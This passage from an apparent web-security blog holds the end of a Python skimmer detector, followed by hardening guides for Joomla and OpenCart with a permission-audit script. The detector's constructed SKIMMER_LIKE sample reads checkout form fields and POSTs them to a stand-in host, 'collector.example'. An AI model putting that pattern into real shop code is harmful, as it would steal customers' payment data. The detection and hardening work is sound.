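def external_hosts(script, store_host):
    """Hosts in absolute URLs that are neither the store nor its subdomains."""
    hosts = {h.lower().rstrip(".") for h in HOST_IN_URL.findall(script)}
    return sorted(h for h in hosts
                  if h and h != store_host and not h.endswith("." + store_host))


def analyze(script, store_host):
    """Report which of the traits described in the article a script shows."""
    lowered = script.lower()
    traits = {
        "gates_on_checkout": "location" in lowered
        and any(fragment in lowered for fragment in CHECKOUT_FRAGMENTS),
        "reads_form_fields": bool(FIELD_QUERY.search(script)),
        "sends_in_background": bool(SEND_CALL.search(script)),
        "external_hosts": external_hosts(script, store_host.lower()),
    }
    # Flag only the full combination; each trait alone is common in shop code.
    traits["suspicious"] = all(traits.values())
    return traits


# Constructed samples, shortened and not taken from a real incident.
SKIMMER_LIKE = """
if (/onepage|checkout|onestep/.test(window.location.href)) {
  var fields = document.querySelectorAll('input, select, textarea');
  jQuery.ajax({url: 'https://collector.example/g', type: 'POST', data: payload});
}
"""
OWN_CHECKOUT = """
if (window.location.pathname.indexOf('/checkout/onepage') === 0) {
  var fields = document.querySelectorAll('#co-form input');
  jQuery.ajax({url: '/checkout/onepage/saveOrder', type: 'POST', data: order});
}
"""
```

Plain string matching misses obfuscated or encoded scripts, so a clean result is not proof that a store is clean; use it to prioritise files for manual review.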

To ensure Magento security, it is necessary to install the security patches issued by the manufacturer in a timely manner.

How to Harden Joomla Security
https://www.siteguarding.com/security-blog/how-to-harden-joomla-security/
Wed, 26 Jul 2017 09:42:18 +0000

A virus is a piece of software, and it does not reach a site out of thin air. A virus gets onto a site either after a hack or when the owner (administrator) of the site brings it in with extensions and system templates. Let’s consider the 6 main points of “entry” for viruses on a site.

1. Hacking server hosting provider

Any hosting provider’s service is, in fact, a large computer that is also exposed to attacks and infections. Unfortunately, if your sites are located on a service that has been or is being attacked, you can only react after the fact, that is, eliminate the consequences of the hack or attack.

Protection against hacking of the hosting provider’s service can only be preventative.

When choosing a hosting provider, pick only trusted, top-tier services. Note whether the hosting provider uses its own data center or rents one. In reviews of the hosting provider, pay attention to the statistics on its downtime and the unavailability of sites.

Site “defenders” have a first “golden” rule: create a separate user account for each domain (site). This is practically unworkable on shared hosting (hosting where you are allowed to create 2-20 sites under the same account), but it is quite feasible on VDS servers. Separating sites by account isolates them from each other, so when one site is infected, a similar infection of the other sites is ruled out.

2. Hacking the site through “holes” (CMS vulnerabilities)

Any content management system (CMS) eventually becomes vulnerable, and Joomla is no exception. That is why it’s important for Joomla Security to monitor system updates and periodically apply new security releases.

3. Hacking CMS Joomla

The methods of hacking the CMS are as follows:

– Hacking the website and uploading shells and backdoors through various upload forms: photos, media files, and other files;
– Introduction of malicious code through spam mailing or through SQL injection;
– Theft of site administrator data (SQL injections, XSS attacks, brute force);
– Website infection through third-party extensions and templates;
– Downloading extensions and templates from blogs and webmasters’ sites, even the most famous ones, is a direct way to a possible infection of the site. Sometimes such an extension, passed along a chain from user to user, leads to mass infection;
– All kinds of “torrent” trackers offering a free download of a paid extension or template are not recommended either.

4. Hacking the Joomla site with a brute force attack

A brute-force attack is the guessing of the site administrator’s name and password. This loophole is closed by using complex administrator passwords and changing the administrator’s name from “admin” to another one.

5. Website hijacking through FTP interception

It is impossible to work with a site without FTP access to the site directory. The FTP protocol is quite accessible, and it would be strange if attackers did not try to use this loophole. To protect yourself from it, use the SFTP protocol, create a separate FTP account for each site, and do not store passwords in the FTP client.

6. Unprofessionalism of hired freelancers

If you do not maintain the site yourself and hire freelancers to change the design or do other work, infection with virus code is possible.

How to Secure OpenCart CMS
https://www.siteguarding.com/security-blog/how-to-secure-opencart-cms/
Tue, 25 Jul 2017 11:13:25 +0000

OpenCart, like some other CMS, can be called a relatively secure platform. However, as with other content management systems, it is better to immediately take care of the security and protection of your site from hacking by unauthorized persons. In this article, we’ll give you basic tips that will help you to improve the OpenCart Security of your site. First of all, the article is suitable for those who have their own online stores made on the basis of OpenCart, but, on the other hand, the tips are quite universal, so they will be interesting to site owners on other CMS.

1. Hiding the login to the administrative panel

By default, the admin panel is usually reached at your_site/admin. Naturally, the more information hackers have, the easier it will be for them to hack your site. Therefore, the first recommendation is to change the login address of the admin panel from /admin to another one: /manager, /panel or something even more complicated.

How to do it: in the file manager or in phpMyAdmin, first, rename the “admin” folder; second, make the same replacement in the “config.php” file inside the folder that you renamed; third, you sometimes also need to change the “config.php” file in the root folder (check whether “admin” is mentioned there).

2. Change the administrator’s login and password

After changing the address of the panel, it is worth thinking about changing the login, which by default is also “admin”. It should be noted that this is the main login commonly used on many CMS, so even if your store or site is not on OpenCart, I still advise you to change it immediately.

How to do it: go to the admin panel, select “System”, then “Users” and again “Users”. Find the line with the login “admin”, go to its settings and change the login to another one.

By the way, you can change the password right there too. I strongly recommend that you do this and create a password no shorter than ten characters. If you cannot come up with one yourself, use one of the online services for generating passwords, which can be easily found in Google.

3. Change access rights for important files

Two files, namely config.php in the root folder and config.php in the folder that is called admin by default (and whose name was changed above), contain important information associated with the database, so it is recommended to change the permissions for these files to “Read Only”.

How to do it: you can change the rights with any tool that you use to work with files. The easiest way is to change them directly in the hosting control panel.
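The checks from sections 1 and 3 can be automated. This is an added example, not part of the original article or of OpenCart itself: the function names and the sample tree are constructed, and the script assumes the renamed panel folder is any first-level folder that contains its own config.php.

```python
import os
import stat

DEFAULT_ADMIN_DIR = "admin"  # default panel folder name, per the article
WRITE_BITS = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH


def config_files(root):
    """config.php in the store root and in each first-level folder that has one."""
    paths = [os.path.join(root, "config.php")]
    for entry in sorted(os.listdir(root)):
        candidate = os.path.join(root, entry, "config.php")
        if os.path.isfile(candidate):
            paths.append(candidate)
    return paths


def audit_opencart(root):
    """Return findings for section 1 (panel folder) and section 3 (permissions)."""
    findings = []
    if os.path.isfile(os.path.join(root, DEFAULT_ADMIN_DIR, "config.php")):
        findings.append("panel still uses the default folder name 'admin'")
    for path in config_files(root):
        name = os.path.relpath(path, root).replace(os.sep, "/")
        if not os.path.isfile(path):
            findings.append(f"missing: {name}")
            continue
        mode = stat.S_IMODE(os.stat(path).st_mode)
        if mode & WRITE_BITS:  # any write bit means the file is not read-only
            findings.append(f"writable ({mode:03o}): {name}")
    return findings


def build_sample_store(root, panel_dir, mode):
    """Create a constructed, minimal store tree for trying the audit."""
    os.makedirs(os.path.join(root, panel_dir))
    for path in (os.path.join(root, "config.php"),
                 os.path.join(root, panel_dir, "config.php")):
        with open(path, "w") as handle:
            handle.write("<?php // constructed placeholder\n")
        os.chmod(path, mode)


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as store:
        build_sample_store(store, "admin", 0o644)
        print("\n".join(audit_opencart(store)))
```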

4. Disabling the display of errors

As a rule, when hacking websites, hackers use different loopholes, and the error messages displayed in response to wrong actions are often very helpful to them. Therefore, I recommend that you turn off the display of these errors.

Here you will most likely ask: what if you need to look at the errors? To do this, you can use the error log file (its name is in the same block of the settings).

You can view it if you go to the root folder of the site, then to system and then to logs.

How to do it: go to the admin panel, open “System”, then “Settings”, and in the settings open the “Server” tab. At the bottom there is the “Errors” block, where you should set “Show errors” to “No”.
